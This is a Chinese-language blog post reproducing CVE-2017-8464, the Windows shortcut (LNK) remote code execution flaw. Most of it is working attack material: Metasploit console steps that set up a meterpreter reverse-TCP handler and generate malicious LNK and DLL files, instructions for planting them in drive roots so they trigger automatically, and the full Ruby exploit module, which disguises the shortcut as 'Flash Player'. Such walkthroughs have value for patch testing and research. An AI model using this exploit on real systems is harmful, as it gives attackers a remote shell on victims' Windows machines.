LNK文件（快捷方式）远程代码执行漏洞复现过程（CVE-2017-8464）

Posted 2020-09-30

 

漏洞编号：CVE-2017-8464
漏洞等级：严重
漏洞概要：如果用户打开攻击者精心构造的恶意LNK文件，则会造成远程代码执行。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
攻击者可以通过可移动驱动器（U盘）或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户。当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时，与之关联的恶意二进制代码将在目标系统上执行。
受影响版本
桌面系统：Windows 10, 7, 8.1, 8, Vista和Windows RT 8.1
服务器系统：Windows Server 2016，2012，2008

利用脚本下载地址：https://www.exploit-db.com/exploits/42382/

利用过程：kali里面利用wget将rb脚本下载到msf指定目录

[email protected]:～#cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
[email protected]:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://www.exploit-db.com/download/42382 -O cve_2017_8464_lnk_rce.rb

wget中，-O参数是将下载的文件重命名

然后设置kali监听本地任意未被占用端口，这里监听5555端口

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.217.131
lhost => 192.168.217.131
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.217.131:5555 
[*] Starting the payload handler...
msf exploit(handler) > 

然后使用payload生成link文件和dll文件

msf exploit(handler) > use exploit/windows/fileformat/cve-2017-8464-link-rce
msf exploit(cve-2017-8464-link-rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(cve-2017-8464-link-rce) > set lhost 192.168.217.131
lhost => 192.168.217.131
msf exploit(cve-2017-8464-link-rce) > set Lport 5555
Lport => 5555
msf exploit(cve-2017-8464-link-rce) > exploit 

此时会生成很多link文件和一个dll文件

每个link文件后的为对应盘符，将对应link文件和dll文件放入对应盘符下的根目录会自动触发漏洞，获取msf的session，不仅仅限制于U盘。

payload脚本：cve_2017_8464_lnk_rce.rb

 

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE

  attr_accessor :exploit_dll_name

  def initialize(info = {})
    super(update_info(info,
      ‘Name‘            => ‘LNK Remote Code Execution Vulnerability‘,
      ‘Description‘     => %q{
        This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
        that contain a dynamic icon, loaded from a malicious DLL.

        This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
        similar except in an additional SpecialFolderDataBlock is included. The folder ID set
        in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
        the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
        DLL file.
      },
      ‘Author‘          =>
        [
          ‘Uncredited‘,   # vulnerability discovery
          ‘Yorick Koster‘ # msf module
        ],
      ‘License‘         => MSF_LICENSE,
      ‘References‘      =>
        [
          [‘CVE‘, ‘2017-8464‘],
          [‘URL‘, ‘https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464‘],
          [‘URL‘, ‘http://paper.seebug.org/357/‘], # writeup
          [‘URL‘, ‘http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt‘] # writeup
        ],
      ‘DefaultOptions‘  =>
        {
          ‘EXITFUNC‘    => ‘process‘,
        },
      ‘Arch‘            => [ARCH_X86, ARCH_X64],
      ‘Payload‘         =>
        {
          ‘Space‘       => 2048,
        },
      ‘Platform‘        => ‘win‘,
      ‘Targets‘         =>
        [
          [ ‘Windows x64‘, { ‘Arch‘ => ARCH_X64 } ],
          [ ‘Windows x86‘, { ‘Arch‘ => ARCH_X86 } ]
        ],
      ‘DefaultTarget‘  => 0, # Default target is 64-bit
      ‘DisclosureDate‘  => ‘Jun 13 2017‘))

    register_advanced_options(
      [
        OptBool.new(‘DisablePayloadHandler‘, [false, ‘Disable the handler code for the selected payload‘, true])
      ])
  end

  def exploit
    dll = generate_payload_dll
    dll_name = "#{rand_text_alpha(16)}.dll"
    dll_path = store_file(dll, dll_name)
    print_status("#{dll_path} created copy it to the root folder of the target USB drive")

    # HACK the vulnerability doesn‘t appear to work with UNC paths
    # Create LNK files to different drives instead
    ‘DEFGHIJKLMNOPQRSTUVWXYZ‘.split("").each do |i|
      lnk = generate_link("#{i}:\\\\#{dll_name}")
      lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
      print_status("#{lnk_path} create, copy to the USB drive if drive letter is #{i}")
    end
  end

  def generate_link(path)
    path << "\\x00"
    display_name = "Flash Player\\x00" # LNK Display Name
    comment = "\\x00"

    # Control Panel Applet ItemID with our DLL
    cpl_applet = [
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 
      0x00, 0x00
    ].pack(‘C*‘)
    cpl_applet << [path.length].pack(‘v‘)
    cpl_applet << [display_name.length].pack(‘v‘)
    cpl_applet << path.unpack(‘C*‘).pack(‘v*‘)
    cpl_applet << display_name.unpack(‘C*‘).pack(‘v*‘)
    cpl_applet << comment.unpack(‘C*‘).pack(‘v*‘)

    # LinkHeader
    ret = [
      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
      0x00, 0x00, 0x00, 0x00, # FileAttributes
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
      0x00, 0x00, 0x00, 0x00, # FileSize
      0x00, 0x00, 0x00, 0x00, # IconIndex
      0x00, 0x00, 0x00, 0x00, # ShowCommand
      0x00, 0x00, # HotKey
      0x00, 0x00, # Reserved1
      0x00, 0x00, 0x00, 0x00, # Reserved2
      0x00, 0x00, 0x00, 0x00  # Reserved3
    ].pack(‘C*‘)

    # IDList
    idlist_data = ‘‘
    idlist_data << [0x12 + 2].pack(‘v‘) # ItemIDSize
    idlist_data << [
      # This PC
      0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack(‘C*‘)
    idlist_data << [0x12 + 2].pack(‘v‘) # ItemIDSize
    idlist_data << [
      # All Control Panel Items
      0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack(‘C*‘)
    idlist_data << [cpl_applet.length + 2].pack(‘v‘)
    idlist_data << cpl_applet
    idlist_data << [0x00].pack(‘v‘) # TerminalID

    # LinkTargetIDList
    ret << [idlist_data.length].pack(‘v‘) # IDListSize
    ret << idlist_data

    # ExtraData
    # SpecialFolderDataBlock
    ret << [
      0x10, 0x00, 0x00, 0x00, # BlockSize
      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)
      0x28, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
    ].pack(‘C*‘)
    # TerminalBlock
    ret << [0x00, 0x00, 0x00, 0x00].pack(‘V‘)
    ret
  end

  # Store the file in the MSF local directory (eg, /root/.msf4/local/)
  def store_file(data, filename)
    ltype = "exploit.fileformat.#{self.shortname}"

    if ! ::File.directory?(Msf::Config.local_directory)
      FileUtils.mkdir_p(Msf::Config.local_directory)
    end

    if filename and not filename.empty?
      if filename =~ /(.*)\\.(.*)/
        ext = $2
        fname = $1
      else
        fname = filename
      end
    else
      fname = "local_#{Time.now.utc.to_i}"
    end

    fname = ::File.split(fname).last

    fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, ‘‘)
    fname << ".#{ext}"

    path = File.join("#{Msf::Config.local_directory}/", fname)
    full_path = ::File.expand_path(path)
    File.open(full_path, "wb") { |fd| fd.write(data) }

    full_path.dup
  end
end